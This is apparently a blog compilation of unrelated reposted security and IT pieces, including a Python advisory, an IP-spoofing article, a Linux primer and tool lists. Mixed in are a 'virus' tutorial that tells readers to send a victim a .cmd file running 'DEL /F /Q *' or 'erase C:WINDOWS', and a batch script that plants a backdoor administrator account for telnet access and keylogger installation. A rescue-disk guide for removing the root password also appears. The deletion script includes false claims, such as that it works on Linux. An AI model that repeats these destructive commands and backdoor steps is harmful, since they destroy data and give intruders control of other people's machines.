IT_Solution for Learning

Python Security Advisory


Advisory ID: PSF-2006-001
Issue Date: October 12, 2006
Product: Python
Versions: 2.2, 2.3 prior to 2.3.6, 2.4 prior to 2.4.4, wide unicode (UCS-4) builds only
CVE Names: CAN-2006-4980

Python is an interpreted, interactive, object-oriented programming language. It is often compared to Tcl, Perl, Scheme or Java.

The Python development team has discovered a flaw in the repr() implementation of Unicode string objects which can lead to execution of arbitrary code due to an overflow in a buffer allocated with insufficient size.

The flaw only manifests itself in Python builds configured to support UCS-4 Unicode strings (using the --enable-unicode=ucs4 configure flag). This is still not the default, which is why the vulnerability should not be present in most Python builds out there, especially not the builds for the Windows or Mac OS X platform provided by www.python.org.

You can find out whether you are running a UCS-4 enabled build by looking at the sys.maxunicode attribute: it is 65535 in a UCS-2 build and 1114111 in a UCS-4 build.

More information can be found in this posting to the python-dev mailing list: http://mail.python.org/pipermail/python-dev/2006-October/069260.html

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2006-4980 to this issue.

Python 2.4.4 and Python 2.3.6 are available from www.python.org and contain a fix for this issue. Python 2.5 also contains the fix and is not vulnerable.

Patches for Python 2.2, 2.3 and 2.4 are also immediately available:

* http://python.org/files/news/security/PSF-2006-001/patch-2.3.txt (Python 2.2, 2.3)
* http://python.org/files/news/security/PSF-2006-001/patch-2.4.txt (Python 2.4)

Acknowledgement: thanks to Benjamin C. Wiley Sittler for discovering this issue.

reference:python.org

You have lost your root password on your linux box and now you consider formatting
everythign to regain control? Your admin is a moron that leaves the server available
physically for everybody? You wanna test your Linux box? Don’t worry if you have at least
a floppy rescue disk under hand,you can root it ;-) )

The problem with the new version of Linux since 6.2 is :

a)the shadow suit that is installed by default (masking the password in the shadow file)

b)the md5 encryption ( 34 characters vs 13 for standard DES) so it’s not as easy as it was
in teh previous versions i.e. to simply get the /etc/passwd file and running JtR against it
doesn’t work anymore.

What to do now? Follow the guide :

1- Boot with a rescue disk

2- type the appropriate key to get into rescue mode (ex.F4)

3- linux rescue (to get into this mode)

4- $ mknod /dev/hda (to create a virtual HD)

* * * N o t e * * *

If you have more than one partition on your HD, check which one is the Linux partition:

A- $ fdisk /dev/hda

B-( fdisk) : p (to show the current partitions) : m (for commands)

5- $ mknod /dev/hda2 ( create the partition2 device if you have a DOS partition as primary
partition for example)

6- $ mkdir /data (to create a virtual directory in the RAM drive)

7- $ mount -t ext2 /dev/hda2 /data ( to mount the files in the virtual dir located in the
RAM drive)

8-$ cd /data/etc

9- $ chmod 700 /data/etc/shadow
or $ chmod u+w /data/etc/shadow ( to gain write access on the shadow file)

10-$ /data/bin/vi /data/etc/shadow (to edit the shadow file with VI editor)

11- type i to insert then remove the root password by positionning the cursor on the
characters and type the x key

12- type escape key then ” : ”

13- save the file with : wq!

At this point, everything you have done is in RAM and nothing is done on the HD so DON’T
REBOOT YET!!

14- $ cd / (to return back to /)

15- $ umount /data

16- $ init 0 (rebooting the system)

Now you can log in as root; there is no password protecting root anymore.

Take care everyone, Just1ce.

reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/

n order login into Linux system (over ssh or other services ) you need a username and password.
Username and password stored in /etc/passwd and /etc/shadow file respectively. When you supplies password, it encrypts and compare with password stored in /etc/shadow, which is also in, encrypted format (it was stored when you or system administrator registers/updates it). If both are equal, you are in. Once logged in, you become the number to Linux kernel. You can obtain your user id and other information using id command:

$ id
uid=1002(vivek) gid=1002(vivek) groups=1002(vivek), 0(wheel)

Where,
=> Username = vivek
=> User numeric id (uid) = 1002

Numbers are uses to represent users and groups in Linux kernel because:
1) Simplified user and group management
2) Security management easy
3) Your UID applied to all files you create

It is always good idea to use the UID more than 1000 for all users for security reason.
Zero UID

The UID number 0 is special and used by the root user. The zero (0) UID enjoys the unrestricted/unlimited access to Linux system. Note that 0 UID assigned to name root; if you wish you can change this (poorly written program may fail) and assign different name.

Similarly, you have group id (GID). It is use by Linux to refer group names. Single user can be member of multiple groups. This result into very good flexibility for access the system and the sharing files. Many UNIX system uses wheel group as power user group. Like the UID value, zero GID value zero enjoys the unrestricted/unlimited access to Linux system.

Some time Linux and other UNIX like (FreeBSD, Solaris etc) uses EUID, RUID, and SUID concept.
The Effective User ID (EUID)

It is use to determine what level of access the current process has. When EUID is zero then the process has unrestricted/unlimited access. Following commands can be used to print Effective User ID under Linux:
$ whoami
$ id -un
The Real User ID (RUID):

It is use to identify who you actually are. Once it is setup by system (usually login program) it cannot be change till your session terminates. You cannot change your RUID. Only root (or person having zero UID) can change the RUID. Use the command id as follows to obtain Real user ID:
$ id –ru
The Saved User ID (SUID):

When new process / executable file such as passwd, started the effective user id that is in force at the time is copied to the saved user id. Because of this feature, you are able to update your own password stored in /etc/shadow file. Off course, executable file must have set-user-id bit on in order to setuid (system call). Before process ending itself it switches back to SUID.

In short,

* RUID : Identify the real user, normal user cannot change it.
* EUID : Decides access level, normal user can change it.
* SUID : Saves the EUID, normal user cannot change it.
* Real Group ID : Identify the real group
* Effective Group ID and Supplementary group ID : Decides access level

Note that access level means kernel can determine whether you have access to devices, files etc.

reference: http://www.cyberciti.biz/

by Rik Farrow

Network Magazine

Networks rely on the truth. Without accurate information, networks work poorly, if at all. However, there are those who use lies to deceive networks and the systems attached to them. These lies can take many forms, such as source address spoofing, but lie detectors exist to help you spot falsehoods and keep your network secure.

Source address spoofing alters a packet's return address so that the packet appears to have come from a source other than the sender. An attacker uses source address spoofing for two reasons: to gain access to resources that only accept requests from specific source addresses, or to hide the source of an attack.

Attackers have used this technique for many years. In fact, the Distributed Denial of Service (DDoS) attacks launched against commercial sites in February 2000 used source address spoofing. Other forms of attack also employ this technique, but most of them would prove unsuccessful today—except for those involving SNMP.

Source address spoofing is often misunderstood, and therefore a cause for concern. Without preventative measures in place, you could become a victim of source addressing spoofing. (A more likely scenario would turn you into an unknowing source of a source-address-spoofing attack.)
On This Page

Local And Remote
Source Route
Hiding The Source
How To Get Spoof-Proof
Tell Me No Lies
Local And Remote

While relying on source addresses to protect services is not a good idea, software that is oriented toward the source of requests is still common. For example, SNMP—a security disaster—often attempts to protect agents on network devices or systems by only accepting requests from specific source addresses. Also, UNIX r commands, the Network File System (NFS), Server Message Block (SMB), and TCP wrappers all include the source address (or system name, in the case of NFS) as part of the access control checks.

These services are especially vulnerable to local attacks in unswitched networks. This is because it is easy for an attacker to sniff packets in an unswitched network, and sniffing contributes to the success of most attacks. On the other hand, switched networks make it difficult (if not impossible) to sniff packets.

SNMP is a good example. Suppose SNMP agents have been configured to only respond to requests for information or changing variables from a server at the address 10.2.2.98. Using netcat, a tool for sending or receiving IP packets, an attacker can easily spoof a request from 10.2.2.98 and send it to the agent of his or her choice.

When the agent responds, it will send the response back to 10.2.2.98. The real manager will ignore the response, as it won't correspond to any outstanding request. The attacker, however, will need to sniff the response off the network for the attack to succeed, as the response was routed back to the real SNMP manager.

Even if the attacker cannot sniff the response, the attack might still succeed, as variables can be successfully changed (via an SNMP set command) without seeing the response. If the attacker shares the same subnet with the manager, the attacker might use Reverse Address Resolution Protocol (RARP) to masquerade as the manager of the IP address.

Remote attacks that seek access via source address spoofing must also have some way of seeing the return packets. Keep in mind that when a remote attacker spoofs some other network's source address, the responses will be routed to that other network, and the attacker will not receive those packets. Of course, the attacker might be able to sniff along the route to the other network. This type of attack, which requires breaking into systems located within ISPs or other intermediate networks, has been successfully carried out.
Top Of Page
Source Route

Another old trick that may still work involves source routing. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers.

Source routing can be strict or loose. Strict source routing lets a manager specify the path through all the routers to the destination. Return responses use the same path in reverse. Loose source routing lets managers specify an address that the packet must pass through on its way to the destination. It is loose source routing that aids an attacker.

A remote attacker might seek to access a UNIX system protected with TCP wrappers, or a Windows NT Internet Information Server (IIS) protected by an access list based on source addresses. If the attacker simply spoofs one of the permitted source addresses, the attacker may never get a response. However, if the attacker both spoofs an address and sets the loose-source-routing option to force the response to return to the attacker's network, the attack can succeed.

The simplest defense against loose source routing is to not permit these packets to enter (or leave) the network. Just about any firewall will block any packet that has source routing enabled by default. You can also configure routers to block packets with source routing. TCP wrappers and many UNIX OSs can also block source-routed packets.

An attacker might also attempt "blind spoofing" to gain access to a system that "protects" itself by checking source addresses. In blind spoofing, the attacker may not need to see the responses for the attack to be successful. The first known version of this attack was launched against security specialist Tsutomu Shimomura in 1994. Shimomura was using TCP wrappers to protect his UNIX system from unauthorized access. However, the attacker succeeded by guessing the sequence numbers used in the response packets during the attack, which enabled the attack to change the configuration of the targeted system.

Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number. (There are some constraints on this "random" value, however, to keep it from working incorrectly.)

Using the source address to authorize a network request is not safe. To improve your security, replace r commands with Secure Shell (SSH), and only use NFS and SMB with improved authentication (SMB has stronger authentication in all versions beyond Windows for Workgroups).

SNMP 1 and SNMP 2 still rely on source addresses for security. While you can block SNMP at the borders of your networks, you will remain vulnerable to SNMP-based scanning and attacks on your internal networks until SNMP 3 has been implemented and installed.
Top Of Page
Hiding The Source

Besides spoofing source addresses for phony authentication, attackers can also spoof their own source addresses in attacks where reply packets are not important. Any network-based Denial of Service (DoS) attack fits this description because the point of the attack is not to get a response but instead to flood the target with requests.

In DoS attacks, it actually makes more sense for the attacker to spoof the source address, otherwise the attacker might wind up blocking his or her own access to the network. Spoofing source addresses also makes tracking the attack much more difficult, as the packets themselves must be traced on each network and subnet, back to the source.

Source address spoofing requires root access on UNIX systems. The attacker must have root access so that the attack software can open a "raw" network socket. Most applications use "cooked" sockets, in which the IP stack provides the necessary packet headers. A raw socket means that the application must prepare the necessary headers itself—that is, do its own cooking. This permits the attacker to put any information he or she wants in the headers, including spoofed source addresses. Note that Windows NT also supports raw sockets, so this is not just a UNIX issue.
Top Of Page
How To Get Spoof-Proof

DoS attacks that use source address spoofing became popular in 1997. RFC 2267 was written in response to this type of attack. It suggests that ISPs practice ingress filtering (see Distributed Denial of Service Attacks, March 2000). In general terms, this means that ISPs should filter traffic and drop any packets with spoofed source addresses. In practical terms, this has proven difficult.

One problem is that many ISPs do not have the technical ability to arrange packet filtering to block packets with spoofed source addresses. Also, many complain that packet filtering reduces equipment performance. While this was true in the past, it is not so today. In the early 1990s, adding packet filtering to a Cisco Systems router could cut throughput by as much as 70 percent. Today, routers have better designs, and it is possible on some routers to block packets with spoofed source addresses with no effect on throughput at all.

For example, Cisco Express Forwarding (CEF) is an advanced IP switching technology, designed for high-performance layer-3 IP backbone switching. You can configure this by executing the following command while in configuration mode:

ip verify unicast reverse-path

A router (or a layer-3 switch) bases routing decisions on the destination address and the routing information. Using the same mechanism, a router can examine the source address and determine if it came from the correct interface. (The route to the source leads back the way it arrived.)

If the route is not the same, the source address must be spoofed, unless asymmetric routes are being used. Asymmetric routes mean that there is more than one way to reach the destination. If asymmetric routing is not in use, enabling this facility will block all packets with spoofed source addresses.

Linux and Berkeley Software Distribution (BSD) system kernels also support a similar facility. If you are using a Linux or BSD system as a router or terminal server, either can be configured to block packets with spoofed source addresses (merely by setting a kernel parameter). In Linux systems, you can enable this mechanism by echoing "2" to each rp_filter name found in the /proc file system (/proc/sys/net/ ipv4/conf/*/rp_filter).

Terminal servers can also block packets with spoofed source addresses. Some terminal servers do this by default. Others can do this by applying an access control list to the Ethernet connection coming from the terminal server (rather than on each incoming modem port). Reports posted to SecurityFocus.com's Bugtraq archives indicated no performance loss at all: CPU usage did increase, but it remained well below 50 percent utilization.
Top Of Page
Tell Me No Lies

The simple solution is to block packets with obviously spoofed source addresses from entering your network. Most firewalls do this by default. If you use packet filters, block packets as they enter the external interface if they have internal source addresses, private network addresses, or the local host address (127/8).

Source address spoofing does not need to be a problem—mechanisms for thwarting it abound. Take the time to be a good Netizen and block these packets at the border of your network. Stop lying packets at the source.

Rik Farrow is an independent security consultant. His Web site, http://www.spirit.com, contains security links and information about network and computer security courses. He can be reached at mailto: rik@spirit.com.
Resources

Computer security expert Wietse Venema's Web site includes information about TCP wrappers. Go to http://www.porcupine.org.

Reports about configuring terminal servers and routers to block spoofed source addresses are available from SecurityFocus.com's Bugtraq archives.

RFC 2267, entitled "Defeating Denial of Service Attacks which Employ IP Source Address Spoofing," is available at http://www.faqs.org/rfcs/rfc2267.html.

reference:http://technet.microsoft.com/en-us/library/cc723706.aspx

A few weeks ago I rushed out an update to fix a potentially dangerous Cross-Site Scripting (XSS) vulnerability in WP-Cumulus. With the PHP part of the plugin shielded from ‘outside use’, I was hoping no more issues would pop up. Still, I’m glad MustLive alerted me to another issue that uses the Flash movie itself. The exploit worked by calling the SWF file directly, and supplying link with javascript. I’m not quite sure how dangerous this is, but I’ve modified the movie so it only executes regular links.

Please update your copy of WP-Cumulus to 1.23 asap. For most users it should only take two clicks.

The should not affect how WP-Cumulus works on WordPress blogs. But there have been a number of ports and other projects that use the Flash movie. I urge the authors of those projects to examine the new Flash movie, and see if it still works in/with their product. The exploit is not unique to WordPress, and they may need to modify the security check to fit their project.

reference:http://www.roytanck.com/

1. Pingdom

Pingdom, which is also available as an iPhone application, makes sure that your website is reachable and responding properly at all times, providing you with email and SMS alerts if it’s not. It monitors uptime and overall performance, creating charts and tables that are easy to understand, enabling you to spot trends and accurately pinpoint problems.

2. Dotcom-Monitor

Dotcom-Monitor is an advanced website monitoring service which maximises your uptime so that you can increase sales and provide a continuous service to customers worldwide, protecting the reputation of your business. It provides real-time and email reports and charts, and sends alerts to exactly the right people when problems arise. It even lets you create multiple logins for numerous users, each of which have permission to access different parts of the tool.

3. McAfee Secure

McAfee Secure monitors your servers for potential security breaches, protecting end-users of your website from identity theft, credit card fraud, spyware, spam, viruses and online scams. Your site is tested and certified daily, and awarded the “live” McAfee Secure mark to show that it has passed its daily test, which greatly increases shopper confidence. McAfee currently certify over 80,000 websites, all of which are listed on the McAfee Secure database.

4. Webmetrics GlobalWatch

GlobalWatch monitors a diverse range of websites, internet applications and services. It identifies and diagnoses downtime, errors and poorly performing transactions, providing performance measurements, detailed reports and flexible alerts. This powerful tool, which supports Web 2.0, AJAX and plugin-based applications like Flash and Java, gives you a truly global perspective on how end-users see your site with monitoring agents stationed in the USA, Asia, Africa and Europe.

5. Nimsoft Monitoring Solutions (NMS)

NMS monitors your servers and their configured server applications. All core server resources, from CPU to memory, event logs, print jobs and queues are accounted for. NMS is not only quick and easy to install, but lightweight (you only install the bits that you really need) and scalable (you can monitor hundreds and even thousands of servers at a time). The NMS dashboard is simple and clear with views showing all your servers interconnected, colour-coded status indicators and server-to-server response times.

6. Solarwinds Orion Network Performance Monitor (NPM)

Orion NPM makes sure that every one of your servers is working 100% efficiently, but it doesn’t stop there: it monitors all routers, switches and wireless access points in your network too. It’s quick to set up, very attractive (a rarity in server monitoring) and supported by hundreds of expert network engineers. What’s more, you don’t have to be an expert yourself to use it: anyone can get it up and running in under an hour, straight out of the box.

7. Nagios

Nagios is a comprehensive IT infrastructure monitoring system that provides a snapshot of your entire operations network while keeping tabs on the health and status of all your applications, services, operating systems, network protocols and system metrics. Instant alerts are sent to your IT staff by email and SMS as soon as problems arise and failed servers, applications and devices can be restarted automatically. Nagios is highly compatible with almost all in-house and third party applications.

8. ENVIROMUX Server Environment Monitoring System

This powerful tool, which is perfect for use in data centers, web hosting facilities, telecom switching sites and server closets, monitors temperature, humidity, liquid presence, motion, intrusion and vibration, to ensure that your server’s operating in ideal physical conditions. You can integrate up to eight video cameras into the system to get a live view from anywhere in the world. Nagio’s users get 5% off the list price.

9. Jacarta interSeptor Pro

The interSeptor Pro records and charts temperature and humidity conditions surrounding your server. It alerts you (via email or SMS) when air conditioning settings should be adjusted to maximise energy savings. Three different models are available: the big 8-port (8 different temperature and humidity sensors), the huge 16-port and the massive 24-port. Additional alarm sensors can be added to detect water leaks, smoke and power failures.

10. Simple Server Monitor

Simple Server Monitor provides a substantial monitoring service for those on a tight budget. It costs just $69.95, following a 30-day free trial. Despite its tiny price tag, it’s packed full of useful features including up-to-the-minute monitoring of uptime and accessible performance charts. It uses popup messages, desktop alarms, email and SMS to alert you to any network uptime losses.

reference:http://www.webdesignbooth.com/10-really-useful-server-monitoring-tools/

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

good bye str0ke...your elite...thanks for your officia website....

This is a program I wrote to benchmark SMTP servers. I started work on this because I need to know which mail server will give the best performance with more than 1,000,000 users. I have decided to release it under the GPL because there is no benefit in keeping the source secret, and the world needs to know which mail servers perform well and which don’t!

At the OSDC conference in 2006 I presented a paper on mail relay performance based on the new BHM program that is now part of Postal.

I have a Postal category on my main blog that I use for a variety of news related to Postal. This post (which will be updated periodically) will be the main reference page for the software. Please use the comments section for bug reports and feature requests.

It works by taking a list of email addresses to use as FROM and TO addresses. I originally used a template to generate the list of users because if each email address takes 30 bytes of storage then 3,000,000 accounts would take 90M of RAM which would be more than the memory in the test machine I was using at the time. Since that time the RAM size in commodity machines has increased far faster than the size of ISP mail servers so I removed the template feature (which seemed to confuse many people).

When sending the mail the subject and body will be random data. A header field X-Postal will be used so that procmail can easily filter out such email just in case you accidentally put your own email address as one of the test addresses. ;)

I have now added two new programs to the suite, postal-list, and rabid. Postal-list will list all the possible expansions for an
account name (used for creating a list of accounts to create on your test server). Rabid is the mad Biff, it is a POP benchmark.

Postal now adds a MD5 checksum to all messages it sends (checksum is over the subject and message body including the “\r\n” that ends each line of text in the SMTP protocol). Rabid now checks the MD5 checksum and displays error messages when it doesn’t match.

I have added rate limiting support in Rabid and Postal. This means that you can specify that these programs send a specific number of messages and perform a specific number of POP connections per minute respectively. This should make it easy to determine the amount of system resources that are used by a particular volume of traffic. Also if you want to run performance analysis software to determine what the bottlenecks are on your mail server then you could set Postal and Rabid to only use half the maximum speed (so the CPU and disk usage of the analysis software won’t impact on the mail server).

I will not release a 1.0 version until the following features are implemented:


* Matching email sent by Postal and mail received by BHM and Rabid to ensure that each message is delivered correctly (no repeats and no corruption)

* IMAP support in Rabid that works

* Support for simulating large numbers of source addresses in Postal. This needs to support at least 2^24 addresses so it is entirely impractical to have so many IP addresses permanently assigned to the test machine.

* Support for simulating slow servers in Postal and BHM (probably reducing TCP window size and delaying read() calls)

* Making BHM simulate the more common anti-spam measures that are in use to determine the impact that they have on list servers

* Determining a solution to the problem of benchmarking DNS servers. This may mean just including documentation on how to simulate the use patterns of a mail server using someone else’s DNS benchmark, but may mean writing my own DNS benchmark.

download link: http://www.coker.com.au/postal/postal-0.70.tgz

reference: http://doc.coker.com.au/projects/postal/

Since a specific dependency can be passed as parameter when the makefile is called I guess an IDE uses this to execute the required command. For example:

COMPILER = /usr/local/cris/bin/gcc-cris
CFLAGS = -mlinux -o
SOURCES = main.c
TARGET = Hello_World
DESTINATION = root@FOXBoard:/mnt/flash/bin/HelloWorld

# top-level rule to create the program, executed by default if no params are provided
all: compile

# Called by pressing the Compile or Build button in Geanny
compile: $(SOURCES)
$(COMPILER) $(CFLAGS) $(TARGET) $(SOURCES)

build: compile

scp $(TARGET) $(DESTINATION)

When the command make compile is executed, the code is only compiled. When the command make build it first executes the compile dependency and than copies the executable to the target. I would expect that the IDE provides the basic menu structure and allows the programmer to enter the command to execute when the menu item is selected. In that case, it’s easy to integrate custom compilers or special target needs in the default IDE.

After spending a hour searching how this works in Anjuta I could not find how to make this work. It might be that Anjuta is already to complex for what I want, it is designed for working with huge open source projects, in my case it will be a couple of local files that need to be managed.

Searching the internet for a simple Linux IDE results in several hits refering to Geany. The home page states “It was developed to provide a small and fast IDE, which has only a few dependencies from other packages”. Sounds like this is what I’m looking for. Using the Applications | Add/Remove… menu in Ubuntu shows that Geany can automaticly be installed.

After installation and starting Geany it is easy to find your way in this program. First guess is that I will be needing to setup a new project, using the Project | New menu option. It asks for a project name (HelloWorld), the file to store the project settings in (HelloWorld.geany) and the base folder of the project (/home/jan/FOXBoard/HelloWorld). After pressing the create button I can open the files that I already created before manually (main.c).

After opening the main.c file the Build menu options are enabled. Selection the Build | Compile menu command shows that gcc is used for compiling the application and that no errors are found. Nice, but I don’t want gcc but I want gcc-cris to be used, or actually I want that make is called with my own parameter.

In the Build menu there is an option available Set includes and arguments, selecting this option shows a dialog that offers three input fields to enter commands for Compile, Build and Execute. Here the gcc command is listed, I guess these commands are indeed given to Linux to execute so entering make compile in the Compile field, make build in the Build field and make build in the Execute field should do the trick. After pressing the OK button and selecting Build | Compile the Compiler shows in blue the execute command (make compile (in directory:/home/jan/FOXBoard/HelloWorld)) and the output of the make program (/usr/local/cris/bin/gcc-cris -mlinux -o Hello_World main.c). After a second a blue message indicates that the Compilation finished successfully. The Build | Build menu command or the Build | Execute command does the same with the addition of executing the secure copy as well.

In the Edit | Preferences menu you can select in the Toolbar tab the option to display a Compile and Run button. These buttons call the Build | Compile menu (and so make compile) and the Build | Execute menu (and so make build) to make life even more easy.

On purpose a mistake is made in main.c to check how errors are handled. The printf is replaced by pri ntf, after pressing compile it shows an error in the Compiler tab and highlights the error in main.c. Very, very nice! It looks like I found my base for the developing code, next step would be to include a debugger as well.

reference : animalrobots

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

on the front end.......
once we register our mail with

mailtracking(dot)com

then we just have to add

.mailtracking.com to the email addresses we have to send to

we can send email which they keep track and send us updates like..,

when it was opened,
to whom it was sent,
etc... etc..

//************************************************************//

real facts behind this trick
first of all,
when we add

.mailtracking.com

we are just sending our mail to them (their server)..
proof : check the mail headers of the recipients, its actually from (something).mailtracking(dot)com,
or check mailed by option in the received email in gmail, it will be like this : "mailed-by gmail.com.scdvbkrtxrndmvk.mailtracking.com"

//***********************************************************//


second,
they add few files which a normal and average user won't recognise..
they add transparent images as shown below..

these 2 are their images (steganography)

http://www.4fvxdj81zkxzh8.mailtracking.com/nocache/4fvxdj81zkxzh9/footer0.gif

size 1x1 px

http://www.4fvxdj81zkxzhh.mailtracking.com/nocache/4fvxdj81zkxzhQ/rspr47.gif

size 4x7 px

and

https://tssls.4fvxdj81zkxzhv.MailTracking.com/nocache/4fvxdj81zkxzhv/rspr47.wav

otally 3 files..
these files are added to email with html tags like etc...
and send to your recipients address..

//************************************************************//

when the user opens the image, the image is retrieved from their server, hence, your user agent is captured and so is the ip address..

and you get info that your victim has read the email, or has forwarded

//***********************************************************//


and the funny part is,
people still don't realize this..
when the image is being retrieved, the server recognizes the user agent, ip address etc..
you wil get their ip, user agent, computer they use, etc...

hack and enjoy...!!!


reference: cyberterrorist

****************( Works only for Linux and Win XP )****************

To delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING!!! DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again


reference:cyberterrorist

For the screenshots, I'll be using my Desktop PC and my Samsung Q1.

You will need a USB Flash Drive and a separate computer connected to the same network.

Wait until the target computer is available for use (maybe the person got up to check on something, who knows). As you enter the computer, you can do 2 things:

1) Have a batch ready on your flash drive. The code should be a little something like this:

@echo off
net user SupportUser codemachine /add
net localgroup administrators SupportUser /add

Good, this batch creates a backdoor administrator account on your target terminal. The second option was to do it by hand, but who wants to do that? The chances of having the time being cut short because of your flash drive being recognized are high, that's my opinion.

Go to the Control Panel > Administrative Tools > Services > Telnet
Make sure that the Telnet service is online.

Now scram, get out of there and head to your other computer. At a safe place, open up your Command prompt (or whatever you're using, I use Putty sometimes even though it sucks) and enter:

telnet 192.168.*.*

You should get a message asking I'd you want to continue..

You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n):



..otherwise you get the login screen. Enter your backdoor information and login. From there you can surf the directories and change peoples passwords. You can install a keylogger to everyones' startup directory, for example.



If you are in a hurry and want to destroy someones PC forever, have someone sitting with the other PC and after you make your backdoor, instantly delete everything. Its very simple, my brother broke his macbook so he was using our old dell laptop. When he was out, I installed a backdoor and began messing around with him while he was online. For example, at the expense of my own Internet, I overloaded the connection and got him to shutdown. When he rebooted, his password was changed!

Have fun and stay safe! ;)

reference:hackforums

When opening a shell, your will be logged in with your active account to your home directory (this is usually in /home/user_name).

check --> that every command has lots of options available. To see all the manual pages for the specific command, simply type "man ". It is important to understand that under Linux operating systems, commands are case-sensitive. This means that "A" is different from "a".

then go thorough files sys .... use:


- pwd - Prints out on the screen the working directory (eg /etc/ssh)
- cd - changes directory (eg cd .. - goes up one dir; cd etc - enters /etc dir)
- ls - lists the content of the directory
- mkdir - creates a new directory (mkdir dir_name)
- touch - creates a new file (touch file_name)
- rmdir - removes a directory (rmdir dir_name)
- cp - copies a file/directory (cp source_file destination_file)
- mv - moves a file/directory - also used for renaming a file or directory (mv old_location new_location or mv old_name new_name)
- rm - removes files (rm file_name)

To search a file, you can use

- find (used for filenames)
- grep
To view a file, you can use

- more - will display a file page by page
- cat - displays all the file
- head - displays the first lines
- tail - displays the last lines (useful for example when you want to view the last information logged in a file by the system for example)

To edit a file you must use a built-in editor from the command-line. Generally, this is vi and it's used with the syntax vi .

To uncompress an archive (usually tar.gz) you must use the tar command with the syntax tar -xvzf .

To print a file, use lpr command. Note that you must have some daemons up and running to manage the printer. Usually this is cups (Common UNIX Printing System) that comes with all major distributions.
To remove a file from printer queue (you can list the queue with lpq command) you can use lprm .

To mount/unmount (add in your file system as accessible media) use:

- mount /mnt/floppy - to mount floppies
- umount /mnt/floppy - to unmount floppie
- mount /mnt/cdrom - to mount CD-ROMs
- mount /mnt/cdrom - to unmount CD-ROMs

They usually mount automatically, but you could end-up in the situation where you must do it manually.
To mount a partition:
First create a directory in /mnt (mkdir /mnt/my_new_drive) then use the mount command (mount /dev/source /mnt/my_new_drive) where /dev/source is the device (partition) you want to mount in your file system.

If you want to connect to a remote host, use the ssh command. The syntax is ssh .

System management:

- ps - shows the current processes running (useful: ps -A shows up all processes)
In the list obtained by using ps command you will see a PID number (Process identification).

This number is required to stop a service or application. Use kill to stop a task.

- top - works somehow like the Task manager in Windows. It shows up the system resources, the processes running, average load, etc. Useful is top
-d - sets up the refresh period. You can put any value from .1 (10 ms) to 100 (100 seconds) or even greater.

- uptime will display the system's uptime and the load average for that moment, 5 minutes and 15 minutes in the past.

Usually, the load average is calculated as the percent of system resources (processor, RAM, harddisk I/O, network load) used at that moment. 0.37 means that 37% was used. A greater value like 2.35 means that the system had to que some data because it should be 235% faster to compute all without problems. Anyhow, this can be different from distribution to distribution.

- free - will display information on system's memory

- ifconfig - view detailed information about your network interfaces; generally your ethernet network interface will be named eth0. You can also set up the network settings like IP address or so by using this command (see man ifconfig). If something goes wrong, you can also stop/start the interface by using ifconfig up/down

- passwd - enables you to change your password (passwd own_user or others if you are logged in as root)

- useradd - enables to add a new user (see man useradd)

Anywhere you are, you cand use the TAB key to autocomplete a filename or command. This will be usefull when getting used to the commands available. You can also hit up arrow and down arrow to scroll through the history of the commands you entered.
You can also use multiple command on one line. Let's say you want to create 3 directories at once. The syntax is mkdir dir1 ; mkdir dir2 ; mkdir dir3.
Another useful thing is the pipe command. You can get a command output through another. Eg: man mkdir | tail will display the last lines in the manual pages of the mkdir command.

If at anytime you are asked for the root account (the super-administrator of the system) you can login in temporary with it by using the su command. You should also include -l (su -l) parameter to switch the home folder and available commands too. Note that you will be prompted for a password too.

To exit the shell type exit or logout.

refrence:cyberterrorists.net

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

Step one.

Get visual basic 2008 here.

Create a new form, select web app.

Step two.

Create 5 buttons, a web browser, and a text box. Tidy it up, make it cool.


Step three


The coding! Ok first, the five buttons are: Go, refresh, back, forward, home and stop.

So for each buttons or what ever I give you the code, double click the object, and copy&paste the code I give. Let's do this!


Go button

WebBrowser1.Navigate(TextBox1.Text)

Home button

WebBrowser1.gohome()

Refresh button

WebBrowser1.Refresh()

Back button

WebBrowser1.GoBack

Forward button

WebBrowser1.GoForward

Stop button

WebBrowser1.Stop

Then press F5 and you're done! I hope this helped you! I might do another TuT on advanced browsers. Have fun!

reference:hackforums.

NASM - The Netwide Assembler is 80x86 assembler designed for portability and modularity.

NASM is an 80x86 assembler designed for portability and modularity. The project supports a range of object file formats including Linux a.out and ELF, COFF, Microsoft 16-bit OBJ and Win32. It will also output plain binary files.

Its syntax is designed to be simple and easy to understand, similar to Intel's but less complex. It supports Pentium, P6, MMX, 3DNow! and SSE opcodes, and has macro capability. It includes a disassembler as well.

